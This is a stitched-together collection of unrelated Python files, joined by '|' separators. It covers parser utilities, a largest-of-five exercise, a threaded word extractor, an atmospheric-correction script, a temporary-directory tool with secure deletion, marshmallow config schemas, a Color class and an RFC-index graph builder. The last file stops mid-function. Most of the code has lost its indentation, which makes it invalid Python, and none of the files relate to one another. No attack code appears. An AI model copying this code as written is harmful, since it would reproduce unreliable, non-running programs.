from cmp.pycompiler import Production, Sentence, Symbol, EOF, Epsilon
class ContainerSet:
def __init__(self, *values, contains_epsilon=False):
self.set = set(values)
self.contains_epsilon = contains_epsilon
def add(self, value):
n = len(self.set)
self.set.add(value)
return n != len(self.set)
def extend(self, values):
change = False
for value in values:
change |= self.add(value)
return change
def set_epsilon(self, value=True):
last = self.contains_epsilon
self.contains_epsilon = value
return last != self.contains_epsilon
def update(self, other):
n = len(self.set)
self.set.update(other.set)
return n != len(self.set)
def epsilon_update(self, other):
return self.set_epsilon(self.contains_epsilon | other.contains_epsilon)
def hard_update(self, other):
return self.update(other) | self.epsilon_update(other)
def find_match(self, match):
for item in self.set:
if item == match:
return item
return None
def __len__(self):
return len(self.set) + int(self.contains_epsilon)
def __str__(self):
return '%s-%s' % (str(self.set), self.contains_epsilon)
def __repr__(self):
return str(self)
def __iter__(self):
return iter(self.set)
def __bool__(self):
    return len(self) > 0
def __eq__(self, other):
if isinstance(other, set):
return self.set == other
return isinstance(other, ContainerSet) and self.set == other.set and self.contains_epsilon == other.contains_epsilon
def inspect(item, grammar_name='G', mapper=None):
try:
return mapper[item]
except (TypeError, KeyError ):
if isinstance(item, dict):
items = ',\n '.join(f'{inspect(key, grammar_name, mapper)}: {inspect(value, grammar_name, mapper)}' for key, value in item.items() )
return f'{{\n {items} \n}}'
elif isinstance(item, ContainerSet):
args = f'{ ", ".join(inspect(x, grammar_name, mapper) for x in item.set) } ,' if item.set else ''
return f'ContainerSet({args} contains_epsilon={item.contains_epsilon})'
elif isinstance(item, EOF):
return f'{grammar_name}.EOF'
elif isinstance(item, Epsilon):
return f'{grammar_name}.Epsilon'
elif isinstance(item, Symbol):
return f"G['{item.Name}']"
elif isinstance(item, Sentence):
items = ', '.join(inspect(s, grammar_name, mapper) for s in item._symbols)
return f'Sentence({items})'
elif isinstance(item, Production):
left = inspect(item.Left, grammar_name, mapper)
right = inspect(item.Right, grammar_name, mapper)
return f'Production({left}, {right})'
elif isinstance(item, tuple) or isinstance(item, list):
ctor = ('(', ')') if isinstance(item, tuple) else ('[',']')
return f'{ctor[0]} {("%s, " * len(item)) % tuple(inspect(x, grammar_name, mapper) for x in item)}{ctor[1]}'
else:
raise ValueError(f'Invalid: {item}')
def pprint(item, header=""):
if header:
print(header)
if isinstance(item, dict):
for key, value in item.items():
print(f'{key} ---> {value}')
elif isinstance(item, list):
print('[')
for x in item:
print(f' {repr(x)}')
print(']')
else:
print(item)
class Token:
"""
Basic token class.
Parameters
----------
lex : str
Token's lexeme.
token_type : Enum
Token's type.
"""
def __init__(self, lex, token_type):
self.lex = lex
self.token_type = token_type
def __str__(self):
return f'{self.token_type}: {self.lex}'
def __repr__(self):
return str(self)
@property
def is_valid(self):
return True
class UnknownToken(Token):
def __init__(self, lex):
Token.__init__(self, lex, None)
def transform_to(self, token_type):
return Token(self.lex, token_type)
@property
def is_valid(self):
return False
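# Illustrative sketch (not part of the original module): a quick exercise of
# ContainerSet, the helper that FIRST/FOLLOW-style computations build on.
# The symbols used here are plain strings chosen only for the example.
if __name__ == '__main__':
    firsts = ContainerSet('id', '(')
    changed = firsts.add('num')            # True: a new element was added
    changed |= firsts.set_epsilon()        # True: the set now contains epsilon
    other = ContainerSet('num', contains_epsilon=False)
    changed |= firsts.hard_update(other)   # False: nothing new to merge
    pprint(firsts, header='FIRST set:')
    print(len(firsts), changed)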
|
'''
Write a program that reads 5 numbers and prints the largest one.
'''
largest = float('-inf')  # start below any possible input so negative numbers are handled too
for i in range(5):
    num = float(input('Enter a number: '))
    if num > largest:
        largest = num
print(largest)
|
from threading import Thread, Lock
class WordExtractor:
INVALID_CHARACTERS = ["'", ",", ".", "/", "?", ";", ":", "(", ")", "+", "*", "[", "]", "{", "}", "&", "$", "@", "#", "%", "\"", "|", "\\", ">", "<", "!", "=", "(", ")", "`"]
NUMBERS = ["1", "2", "3", "4", "5", "6", "7", "8", "9", "0"]
HIFEN = "-"
ENCODING = "utf-8"
MAX_THREADS = 100
def __init__(self):
self._word_dict = {}
self._lock = Lock()
def _treat_word(self, word):
# Crude normalisation: render the word through its UTF-8 escaped form and drop the b''/backslash markers.
word = str(word.encode(WordExtractor.ENCODING)).lstrip("b").strip("'")
word = word.replace("\\", "")
for character in WordExtractor.INVALID_CHARACTERS:
word = word.strip(character).strip(character)
if(character in word):
return None
for character in WordExtractor.NUMBERS:
if(character in word):
return None
word = word.strip(WordExtractor.HIFEN).strip(WordExtractor.HIFEN)
if(len(word) <= 3):
return None
word = word.lower()
return word
def _add_word_to_dictionary(self, word):
with self._lock:
number_of_ocurrences = self._word_dict.get(word, 0) + 1
self._word_dict[word] = number_of_ocurrences
def _collect_words(self, data):
word_list = data.split()
for word in word_list:
word = self._treat_word(word)
if(word is not None):
self._add_word_to_dictionary(word)
def extract_words(self, data_list):
self._word_dict = {}
thread_list = []
for data in data_list:
thread = Thread(target=self._collect_words, args=(data,))
if(len(thread_list) >= WordExtractor.MAX_THREADS):
oldest_thread = thread_list[0]
oldest_thread.join()
del(thread_list[0])
thread_list.append(thread)
thread.start()
for thread in thread_list:
thread.join()
treated_word_list = list(self._word_dict.keys())
return treated_word_list
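# Illustrative usage (a sketch, not part of the original class). The sample
# strings below are made up; extract_words() returns the distinct normalised
# words found across all documents.
if __name__ == "__main__":
    extractor = WordExtractor()
    documents = [
        "Threads split the work across documents, one thread per document.",
        "Short words, digits (like 42) and punctuation are filtered out!",
    ]
    print(sorted(extractor.extract_words(documents)))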
|
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 22 21:36:57 2019
@author: SJ
"""
import numpy as np
import pickle
import scipy
def corr(a,b,doy):
elliptical_orbit_correction = 0.03275104*np.cos(doy/59.66638337) + 0.96804905
a *= elliptical_orbit_correction
b *= elliptical_orbit_correction
return a,b
fpath = r'E:\S2A_MSI\Continental\view_zenith_0\lut\iLUTs\S2A_MSI_02.ilut'
with open(fpath,"rb") as ilut_file:
iLUT = pickle.load(ilut_file)
'''
solar zenith [degrees] (0 - 75)
water vapour [g/m2] (0 - 8.5)
ozone [cm-atm] (0 - 0.8)
aerosol optical thickness [unitless] (0 - 3)
surface altitude [km] (0 - 7.75)
'''
aots = [0.125, 0.375, 0.625, 0.875, 1.125, 1.375, 1.875, 2.625]
sz = 60
wv = 5
o3 = 0.3
aot = 0.5
km = 0.2
a, b = iLUT(sz, wv, o3, aot, km)
doy = 154
#%%
Ls = np.arange(1,100,0.1)
aots = np.arange(0.01,2.0,0.02)
#sr = (L-a)/b
#%%
ab = []
if True:
for aot in aots:
a,b = iLUT(sz, wv, o3, aot, km)
a,b = corr(a,b,doy)
ab.append([a,b,aot])
Ls = np.arange(1,100,0.1)
tb = np.zeros([Ls.shape[0],len(ab)+1])
count = 0
tb[:,0] = Ls
for each in ab:
count += 1
tb[:,count] = (Ls - each[0])/each[1]
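#%% Worked example (illustrative, not part of the original script): the columns of
# `tb` hold surface reflectance computed as sr = (L - a) / b for each AOT value.
# The radiance value below is made up purely for demonstration.
L_example = 50.0
a0, b0, aot0 = ab[0]
print('AOT %.3f: radiance %.1f -> surface reflectance %.4f' % (aot0, L_example, (L_example - a0) / b0))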
|
# encoding:utf-8
|
#!/usr/bin/env python
"""A module and command line tool for working with temporary directories."""
import calendar
import contextlib
import os
import os.path
import random
import shlex
import shutil
import string
import subprocess
import sys
import time
import tarfile
import tempfile
import zipfile
__version_info__ = 0, 0, 0, "DEV", int(calendar.timegm(time.gmtime()))
__version__ = ".".join(str(part) for part in __version_info__)
__website__ = "https://github.com/jeremybanks/tmpdir"
__author__ = "Jeremy Banks <jeremy@jeremybanks.ca>"
__copyright__ = "Copyright 2011 Jeremy Banks <jeremy@jeremybanks.ca>"
__license__ = "MIT"
__full_license = """\
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE."""
class TmpDir(object):
    """A convenient temporary directory.
    The constructor has two optional arguments.
    inner_name is the basename of the temporary directory.
    deletion selects how the directory is removed once closed:
    "secure" uses the srm command (slow) and fails if srm is unavailable,
    "attempt-secure" falls back to "pseudo-secure" when srm is missing,
    "pseudo-secure" overwrites files with zeros before deleting, and
    "not-secure" simply deletes the directory.
    """
def __init__(self, inner_name=None, deletion="not-secure"):
    self.closed = True
    if deletion not in ("secure", "attempt-secure", "pseudo-secure",
                        "not-secure"):
        raise ValueError("Invalid deletion type.")
if deletion in ("secure", "attempt-secure"):
# confirm availability of secure remove command
try:
subprocess.check_call("which srm >/dev/null", shell=True)
deletion = "secure"
except subprocess.CalledProcessError, e:
if deletion == "attempt-secure":
deletion = "pseudo-secure"
else:
raise e
self.deletion = deletion
self.__outer_path = tempfile.mkdtemp()
self.inner_name = inner_name or "tmp"
self.path = os.path.abspath(
os.path.join(self.__outer_path, self.inner_name))
os.mkdir(self.path)
self.closed = False
def close(self):
if not self.closed:
# move to a new path to immediately invalidate paths being deleted
tmp_path = tempfile.mkdtemp()
new_path = os.path.abspath(os.path.join(tmp_path, rand_name()))
os.rename(self.path, new_path)
self.closed = True
self.path = new_path
if self.deletion == "not-secure":
shutil.rmtree(tmp_path)
shutil.rmtree(self.__outer_path)
elif self.deletion == "pseudo-secure":
pseudosecure_delete_directory(tmp_path)
pseudosecure_delete_directory(self.__outer_path)
else:
subprocess.check_call(["srm", "-rfs", "--", tmp_path])
subprocess.check_call(["srm", "-rfs", "--", self.__outer_path])
def __del__(self):
self.close()
##### Context Managers
#
# .as_cwd() # changes CWD to path, restores previous value on exit
# .__enter__() # .close()es/deletes directory on exit
def as_cwd(self):
"""Use .path as the cwd, restoring old one on exit."""
return WorkingDirectoryContextManager(self.path)
def __enter__(self):
return self
def __exit__(self, xt, xv, tb):
self.close()
#### Serialization (tar)
#
# @classmethod .load(f, compression=None)
# .dump(f, compression="gz")
@classmethod
def load(cls, f, compression=None, inner_name=None, deletion="not-secure"):
"""Loads a temp directory from an optionally-compressed tar file.
If compression is None, it will read the first two bytes of the
stream to look for gzip or bz2 magic numbers, then seek back. To
disable this (if your file object doesn't support it) you can use
the null string "" to indicate an uncompressed tar. Other args
are "bz2" and "gz".
"""
if inner_name is None and hasattr(f, "inner_name"):
inner_name = os.path.splitext(os.path.split(f.inner_name)[0])[0]
if compression is None:
compression = sniff_archive_type(f, "tar")
self = cls(inner_name, deletion)
if compression == "zip":
archive = zipfile.ZipFile(f, mode="r")
archive_infos = archive.infolist()
else:
if compression == "tar":
compression = ""
archive = tarfile.open(fileobj=f, mode="r:" + compression)
archive_infos = iter(archive)
with self.as_cwd():
with contextlib.closing(archive) as archive:
for file_info in archive_infos:
try:
filename = file_info.name
except AttributeError:
filename = file_info.filename
abs_path = os.path.abspath(os.path.join(self.path, filename))
if os.path.commonprefix((abs_path, self.path)) != self.path:
raise ValueError("illegal (external) path in archive", abs_path)
dir_, base = os.path.split(filename)
if dir_ and not os.path.exists(dir_):
os.makedirs(dir_)
if base:
archive.extract(file_info)
return self
def dump(self, f, compression=None):
"""Dumps a compressed-by-default tar of the directory to a file."""
if compression is None:
compression = sniff_archive_type(f, "gz")
if compression == "zip":
archive = zipfile.ZipFile(f, mode="w")
archive_add = archive.write
else:
if compression == "tar":
compression = ""
archive = tarfile.open(fileobj=f, mode="w:" + compression)
archive_add = archive.add
with contextlib.closing(archive) as tar:
with self.as_cwd():
for (path, dirs, files) in os.walk("."):
for filename in files:
archive_add(os.path.join(path, filename))
if compression != "zip":
for dirname in dirs:
archive_add(os.path.join(path, dirname))
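# Illustrative usage (a sketch based on the docstrings above, not part of the module):
#
#   with TmpDir(deletion="attempt-secure") as d:
#       with d.as_cwd():
#           open("scratch.txt", "w").write("temporary data")
#       with open("backup.tgz", "wb") as archive:
#           d.dump(archive, compression="gz")
#   # on exit the directory is removed, securely when srm is available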
class WorkingDirectoryContextManager(object):
def __init__(self, path, value=None):
self.path = path
self.value = value
self.previous_paths = []
def __enter__(self):
self.previous_paths.append(os.getcwd())
os.chdir(self.path)
return self.value
def __exit__(self, xt, xv, tb):
os.chdir(self.previous_paths.pop())
def sniff_archive_type(f, default="tar"):
"""Attempts to determine the type of an archive.
Uses file extensions and magic numbers."""
types_by_extension = {
".bz2": "bz2",
".tbz": "bz2",
".tb2": "bz2",
".tbz2": "bz2",
".zip": "zip",
".gzip": "gz",
".gz": "gz",
".tgz": "gz",
".tar": "tar"
}
if isinstance(f, (str, unicode)):
_name = f
class f(object):
name = _name
if hasattr(f, "name"):
ext = os.path.splitext(f.name)[1]
if ext in types_by_extension:
return types_by_extension[ext]
if hasattr(f, "seek") and hasattr(f, "tell") and "r" in getattr(f, "mode", ""):
start = f.tell()
leading_two = f.read(2)
f.seek(start)
if leading_two == b"\x1F\x8B":
return "gz"
elif leading_two == b"BZ":
return "bz2"
elif leading_two == b"PK":
return "zip"
else:
f.seek(257, os.SEEK_CUR)
ustar = f.read(5)
f.seek(start)
if ustar == b"ustar":
return "tar"
return default
def rand_name(length=8, chars=string.ascii_letters + string.digits + "_"):
return "".join(random.choice(chars) for i in range(length))
def pseudosecure_delete_directory(path):
# zero out each file
for (subpath, dirs, files) in os.walk(path):
for filename in files:
filepath = os.path.abspath(os.path.join(path, subpath, filename))
bytes_to_overwrite = os.path.getsize(filepath)
with open(filepath, "r+") as f:
f.seek(0)
while bytes_to_overwrite > 0:
n = min(bytes_to_overwrite, 1024)
f.write(b"\x00" * n)
f.flush()
os.fsync(f.fileno())
bytes_to_overwrite -= n
# rename each file and directory randomly
for (subpath, dirs, files) in os.walk(path, topdown=False):
for filename in list(files):
filepath = os.path.abspath(os.path.join(os.path.join(path, subpath), filename))
randpath = os.path.abspath(os.path.join(os.path.join(path, subpath), rand_name(8) + ".tmp"))
os.rename(filepath, randpath)
for dirname in list(dirs):
dirpath = os.path.abspath(os.path.join(os.path.join(path, subpath), dirname))
randpath = os.path.abspath(os.path.join(os.path.join(path, subpath), rand_name(8)))
os.rename(dirpath, randpath)
# delete everything, bottom-up
for (subpath, dirs, files) in os.walk(path, topdown=False):
for filename in files:
filepath = os.path.abspath(os.path.join(os.path.join(path, subpath), filename))
os.remove(filepath)
for dirname in dirs:
dirpath = os.path.abspath(os.path.join(os.path.join(path, subpath), dirname))
os.rmdir(dirpath)
# remove the top directory itself
shutil.rmtree(path)
def main(*raw_args):
import argparse
import tmpdir
parser = argparse.ArgumentParser(description="""\
Creates a temporary directory, optionally loading the contents of an archive
(tar, tgz, tbz2 or zip). If run from a shell, opens a bash login shell inside
the directory. Otherwise by default I'll prompt for a newline then exit, but
any other command can be specified.
If no archive is loaded, I automatically attempt to delete the directory
securely; otherwise deletion is not secure unless --delete says so.""")
parser.add_argument(dest="archive", metavar="$ARCHIVE", nargs="?",
help="loads an archive into the directory.")
parser.add_argument("-o", "--out", dest="out",
action="store", type=str, metavar="$ARCHIVE",
help="saves directory as an archive.")
command_options = parser.add_mutually_exclusive_group()
command_options.add_argument("-c", "--command", dest="command",
action="store", type=str, metavar="$COMMAND",
help="run this command in directory instead of default")
command_options.add_argument("-s", "--shell", dest="shell_command",
action="store", type=str, metavar="$COMMAND",
help="as --command, but run in /bin/sh/")
parser.add_argument("-d", "--delete", dest="deletion", metavar="$SECURITY",
choices=["secure", "pseudo-secure", "attempt-secure",
"not-secure"],
help="Specifies the deletion method/security.")
parser.add_argument("-r", "--on-error", dest="on_error", metavar="$ON_ERROR",
choices=["ignore", "fail", "abort"], default="fail")
parser.set_defaults(deletion=None, archive=None, out=None, command=None,
shell_command=None)
args = parser.parse_args(list(raw_args))
if args.command is None:
if args.shell_command is not None:
command = ["/bin/sh", "-c", args.shell_command]
elif hasattr(sys.stdin, "isatty") and sys.stdin.isatty():
command = ["bash", "--login"]
else:
command = ["read", "-p", "Press enter to delete directory..."]
else:
command = shlex.split(args.command)
path = args.archive
deletion = args.deletion
if path is None:
if deletion is None:
deletion = "attempt-secure"
sys.stderr.write("Initializing temporary directory... ")
d = tmpdir.TmpDir(deletion=deletion)
else:
if deletion is None:
deletion = "not-secure"
sys.stderr.write("Loading archive to temporary directory... ")
with open(path, "rb") as f:
d = TmpDir.load(f, inner_name=os.path.basename(path), deletion=deletion)
with d:
sys.stderr.write("(deletion: %s)\n" % (d.deletion))
sys.stderr.flush()
print d.path
sys.stderr.write("----" * 4 + "\n")
if len(command) == 3 and command[:2] == ["read", "-p"]:
sys.stderr.write(command[2])
sys.stderr.flush()
sys.stdin.read(1)
sub_status = 0
else:
env = dict(os.environ)
env["HISTFILE"] = ""
sub_status = subprocess.call(command, cwd=d.path, env=env)
if sub_status and args.on_error != "ignore":
our_status = sub_status
else:
our_status = 0
sys.stderr.write("----" * 4 + "\n")
if args.out and not (sub_status != 0 and args.on_error == "abort"):
sys.stderr.write("Archiving directory contents...\n")
sys.stderr.flush()
with open(args.out, "wb") as f:
d.dump(f)
sys.stderr.write("Deleting temporary directory... ")
sys.stderr.write("(deletion: %s)\n" % (d.deletion))
sys.stderr.flush()
return our_status
if __name__ == "__main__":
sys.exit(main(*sys.argv[1:]))
|
from typing import Any, Dict, Type
from marshmallow import fields, post_load
from marshmallow_enum import EnumField
from marshmallow_oneofschema import OneOfSchema
from mf_horizon_client.data_structures.configs.stage_config import (
BacktestStageConfig,
FeatureGenerationStageConfig,
FilterStageConfig,
PredictionStageConfig,
ProblemSpecificationConfig,
RefinementStageConfig,
StationarisationStageConfig,
)
from mf_horizon_client.data_structures.configs.stage_config_enums import (
CorrelationMethod,
FeatureGeneratorType,
RegressorType,
StationarisationStrategy,
TargetTransformType,
)
from mf_horizon_client.data_structures.configs.stage_types import StageType
from mf_horizon_client.schemas.schema import CamelCaseSchema
from mf_horizon_client.utils.string_case_converters import force_camel_case
class FilteringConfigSchema(CamelCaseSchema):
method = EnumField(CorrelationMethod, required=True)
max_n_features = fields.Integer(required=True)
@post_load # type: ignore
def make( # pylint: disable=no-self-use
self,
data: Any,
many: bool, # pylint: disable=unused-argument
partial: bool, # pylint: disable=unused-argument
) -> FilterStageConfig:
"""
Marshmallow function, invoked after validating and loading json data. Converts
dictionary loaded from json into a filter stage config object.
"""
return FilterStageConfig(**data)
class StationarisationConfigSchema(CamelCaseSchema):
adf_threshold = fields.Float(required=True)
strategy = EnumField(StationarisationStrategy, required=True)
target_transform = EnumField(TargetTransformType, required=True)
@post_load # type: ignore
def make( # pylint: disable=no-self-use
self,
data: Any,
many: bool, # pylint: disable=unused-argument
partial: bool, # pylint: disable=unused-argument
) -> StationarisationStageConfig:
"""
Marshmallow function, invoked after validating and loading json data. Converts
dictionary loaded from json into a stationarisation stage config object.
"""
return StationarisationStageConfig(**data)
class ProblemSpecConfigSchema(CamelCaseSchema):
target_features = fields.List(fields.String(required=False))
horizons = fields.List(fields.Integer(required=True))
data_split = fields.Float(required=True)
used_in_lstm = fields.Boolean(required=False, allow_none=True)
active_columns = fields.List(fields.Integer(required=False))
scale_factor_multiplier = fields.Float(required=True)
@post_load # type: ignore
def make( # pylint: disable=no-self-use
self,
data: Any,
many: bool, # pylint: disable=unused-argument
partial: bool, # pylint: disable=unused-argument
) -> ProblemSpecificationConfig:
"""
Marshmallow function, invoked after validating and loading json data. Converts
dictionary loaded from json into a problem specification stage config object.
"""
return ProblemSpecificationConfig(**data)
class BacktestConfigSchema(CamelCaseSchema):
n_backtests = fields.Integer(required=True)
fold_train_frac = fields.Float(required=True)
gapping_factor = fields.Float(required=True)
regressor = EnumField(RegressorType, required=True)
@post_load # type: ignore
def make( # pylint: disable=no-self-use
self,
data: Any,
many: bool, # pylint: disable=unused-argument
partial: bool, # pylint: disable=unused-argument
) -> BacktestStageConfig:
"""
Marshmallow function, invoked after validating and loading json data. Converts
dictionary loaded from json into a backtest stage config object.
"""
return BacktestStageConfig(**data)
class RefinementConfigSchema(CamelCaseSchema):
min_features = fields.Integer(required=True)
max_features = fields.Integer(required=True)
early_stopping_sensitivity = fields.Float(required=True)
deep_search = fields.Boolean(required=True)
regressor = EnumField(RegressorType, required=True)
@post_load # type: ignore
def make( # pylint: disable=no-self-use
self,
data: Any,
many: bool, # pylint: disable=unused-argument
partial: bool, # pylint: disable=unused-argument
) -> RefinementStageConfig:
"""
Marshmallow function, invoked after validating and loading json data. Converts
dictionary loaded from json into a refinement stage config object.
"""
return RefinementStageConfig(**data)
class FeatureGenerationConfigSchema(CamelCaseSchema):
max_n_features = fields.Integer(required=True)
feature_generators = fields.List(EnumField(FeatureGeneratorType, required=True))
@post_load # type: ignore
def make( # pylint: disable=no-self-use
self,
data: Any,
many: bool, # pylint: disable=unused-argument
partial: bool, # pylint: disable=unused-argument
) -> FeatureGenerationStageConfig:
"""
Marshmallow function, invoked after validating and loading json data. Converts
dictionary loaded from json into a feature generation stage config object.
"""
return FeatureGenerationStageConfig(**data)
class PredictionConfigSchema(CamelCaseSchema):
regressor = EnumField(RegressorType, required=True)
@post_load # type: ignore
def make( # pylint: disable=no-self-use
self,
data: Any,
many: bool, # pylint: disable=unused-argument
partial: bool, # pylint: disable=unused-argument
) -> PredictionStageConfig:
"""
Marshmallow function, invoked after validating and loading json data. Converts
dictionary loaded from json into a prediction stage config object.
"""
return PredictionStageConfig(**data)
@property
def valid_configuration_values(self) -> bool:
return True
class ConfigMultiplexSchema(OneOfSchema): # type: ignore
type_schemas = {
StageType.filtering.name: FilteringConfigSchema,
StageType.problem_specification.name: ProblemSpecConfigSchema,
StageType.stationarisation.name: StationarisationConfigSchema,
StageType.feature_generation.name: FeatureGenerationConfigSchema,
StageType.backtest.name: BacktestConfigSchema,
StageType.refinement.name: RefinementConfigSchema,
StageType.prediction.name: PredictionConfigSchema,
}
config_lookup: Dict[Type[Any], str] = {
FilterStageConfig: StageType.filtering.name,
ProblemSpecificationConfig: StageType.problem_specification.name,
StationarisationStageConfig: StageType.stationarisation.name,
FeatureGenerationStageConfig: StageType.feature_generation.name,
BacktestStageConfig: StageType.backtest.name,
RefinementStageConfig: StageType.refinement.name,
PredictionStageConfig: StageType.prediction.name,
}
def get_obj_type(self, obj: Type[Any]) -> str:
try:
return self.config_lookup[type(obj)]
except KeyError:
raise TypeError(f"Unrecognised type {type(obj)} for multiplex schema, " f"{self.__class__}")
def on_bind_field(self, field_name, field_obj):
field_obj.data_key = force_camel_case(field_obj.data_key or field_name)
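# Illustrative behaviour (a sketch, not part of this module): OneOfSchema uses
# config_lookup to tag each serialised config with its stage type, so dumping a
# FilterStageConfig produces a payload along the lines of
#   {"type": "filtering", "method": ..., "maxNFeatures": ...}
# (field names camel-cased by on_bind_field), and loading such a payload routes
# it back through FilteringConfigSchema.make().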
|
from __future__ import annotations
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from typing import Any, TypeGuard, overload, ClassVar
from typing_extensions import Self, LiteralString
from tg_gui_core.shared import IsinstanceBase
# OPTIMIZATION: # from tg_gui_core.implementation_support import isoncircuitpython
from .stateful import State
class Color(int, IsinstanceBase):
white: ClassVar[Color | State[Color]] = 0xFFFFFF # type: ignore[override]
black: ClassVar[Color | State[Color]] = 0x000000 # type: ignore[override]
gray: ClassVar[Color | State[Color]] = 0x808080 # type: ignore[override]
lightgray: ClassVar[Color | State[Color]] = 0xC0C0C0 # type: ignore[override]
darkgray: ClassVar[Color | State[Color]] = 0x404040 # type: ignore[override]
# TODO:P revise these or change them per-platform
red: ClassVar[Color | State[Color]] = 0xFF0000 # type: ignore[override]
orange: ClassVar[Color | State[Color]] = 0xFFA500 # type: ignore[override]
yellow: ClassVar[Color | State[Color]] = 0xFFFF00 # type: ignore[override]
green: ClassVar[Color | State[Color]] = 0x00FF00 # type: ignore[override]
blue: ClassVar[Color | State[Color]] = 0x0000FF # type: ignore[override]
purple: ClassVar[Color | State[Color]] = 0x800080 # type: ignore[override]
# --- system colors ---
# text foreground
foreground: ClassVar[Color | State[Color]] = 0xFFFFFF # type: ignore[override]
fill: ClassVar[Color | State[Color]] = lightgray # type: ignore[override]
def __new__(cls, rgb_value: int) -> Color:
"""
:param value: The int to convert to a Color.
(lie to the type system and check it with IsinstanceBase's _inst_isinstance_check_)
"""
assert isinstance(rgb_value, int)
if not (0 <= rgb_value <= 0xFFFFFF):
raise TypeError(
f"Color must be an integer between 0 and 0xFFFFFF, not {rgb_value}"
)
# OPTIMIZATION: # if isoncircuitpython():
return rgb_value # type: ignore[return-value]
# OPTIMIZATION: # else:
# OPTIMIZATION: # return int.__new__(cls, rgb_value)
# OPTIMIZATION: # if isoncircuitpython():
@classmethod
def _inst_isinstance_check_(cls, __instance: Any) -> TypeGuard[Self]:
return isinstance(__instance, int) and 0 <= __instance <= 0xFFFFFF
if TYPE_CHECKING:
@overload
@classmethod
def fromrgb(cls, r: int, g: int, b: int) -> Color:
...
@overload
@classmethod
def fromrgb(cls, r: float, g: float, b: float) -> Color:
...
@classmethod
def fromrgb(cls, r: int | float, g: int | float, b: int | float) -> Color:
"""
Combines the red, green, and blue components into a single integer
:param r: red component, int (0-255) or float (0.0-1.0)
:param g: green component, int (0-255) or float (0.0-1.0)
:param b: blue component, int (0-255) or float (0.0-1.0)
:return: the combined color as an int
"""
r = int(r * 255) if isinstance(r, float) else r
g = int(g * 255) if isinstance(g, float) else g
b = int(b * 255) if isinstance(b, float) else b
return cls((r << 16) | (g << 8) | (b << 0))
@classmethod
def fromhex(cls, hex: LiteralString) -> Color:
"""
Takes a hex string of the form '#RRGGBB', '#RGB', format and returns a color
:param hex: the hex string
:return: the color as an int
"""
_hex = str(hex)
assert hex.startswith("#") and (
len(_hex) in (7, 4)
), f"hex string must be '#RRGGBB' or '#RGB' format, not '{hex}'"
# remove the #
src: str = _hex[1:]
# if it is 3 characters, double each character
if len(src) == 3:
src = src[0] * 2 + src[1] * 2 + src[2] * 2
return cls(int(src, 16))
def __int__(self) -> int:
return self # type: ignore[return-value]
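# Illustrative usage (a sketch, not part of the module):
#
#   accent = Color.fromhex("#1E90FF")      # -> 0x1E90FF
#   half_red = Color.fromrgb(0.5, 0, 0)    # floats are scaled by 255 -> 0x7F0000
#   Color(0x808080) == Color.gray          # constants are plain int colour values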
|
import json, os, shutil, re, sys
import urllib.request
import requests
import time
import argparse
from summaries import RFCsSummaries
from groups import RFCsGroups
# Adapted from https://github.com/AndreaOlivieri/rfc2json.git
__COMPLETE_REGEX__ = r"\n(\d{4})\s(?:(Not Issued)|(?:((?:.|\s)+?(?=\.\s*\(Format))(?:\.\s*\((Format[^\)]*)\))?\s*(?:\((Obsoletes[^\)]*)\))?\s*(?:\((Obsoleted\s*by[^\)]*)\))?\s*(?:\((Updates[^\)]*)\))?\s*(?:\((Updated\s*by[^\)]*)\))?\s*(?:\((Also[^\)]*)\))?\s*(?:\((Status[^\)]*)\))?\s*(?:\((DOI[^\)]*)\))?))"
__DATE_REGEX__ = r"(?:(January|February|March|April|May|June|July|August|September|October|November|December)\s*(\d{4}))"
__FORMAT_REGEX__ = r"Format:?\s*(.*)"
__ALSO_FYI_REGEX__ = r"Also:?\s*(.*)"
__STATUS_REGEX__ = r"Status:?\s*(.*)"
__DOI_REGEX__ = r"DOI:?\s*(.*)"
__AUTHORS_REGEX__ = r"(?:((?:[A-Z]\.)+\s[^,\.]*)[,\.]\s?)+?"
__RFC_REGEX__ = r"\s?(?:([A-Z0-9]{4,})(?:,\s)?)+?"
class RFCsGraph():
def __init__(self, rpki_rfcs_file, rfcs_index_file=None, templates_path=None, summaries_result_file=None, groups_file=None, graph_file=None):
self.summaries = {}
self.groups = {}
self.rpki_rfcs = set()
self.__RFC_INDEX_URL__ = "https://www.rfc-editor.org/rfc/rfc-index.txt"
if not templates_path:
self.summaries_folder = "./summaries"
else:
self.summaries_folder = templates_path
if not summaries_result_file:
self.summaries_filename = "./data/rfcs_summaries.json"
else:
self.summaries_filename = summaries_result_file
if not groups_file:
self.groups_file = "./data/rfcs_groups.json"
else:
self.groups_file = groups_file
self.rpki_rfcs_file = rpki_rfcs_file
if not rfcs_index_file:
self.rfcs_index_file = "./data/rfc-index.txt"
else:
self.rfcs_index_file = rfcs_index_file
self.rfcs_json_obj = {}
self.d3js_data = []
if not graph_file:
self.graph_file = "./data/rfcs_data.json"
else:
self.graph_file = graph_file
def get_rpki_rfcs(self, filename):
result = set()
try:
with open(filename) as f:
for line in f:
result.add(line.rstrip())
except:
return False
return sorted([int(i) for i in result])
def get_rfcs_index(self, rfcs_index_file):
try:
INTERVAL= 4
INTERVAL_TIMESTAMP = INTERVAL * 60 * 60
now = time.time()
if not os.path.isfile(rfcs_index_file):
r = requests.get(self.__RFC_INDEX_URL__)
with open(rfcs_index_file, 'wb') as f:
f.write(r.content)
else:
stat = os.stat(rfcs_index_file)
if now > (stat.st_mtime + INTERVAL_TIMESTAMP):
r = requests.get(self.__RFC_INDEX_URL__)
with open(rfcs_index_file, 'wb') as f:
f.write(r.content)
except:
return False
return rfcs_index_file
def clean_text(self, text):
return re.sub(r'\s+', ' ', text).strip()
def clear_rfc(self, rfc_list):
rfcs = []
for rfc in rfc_list:
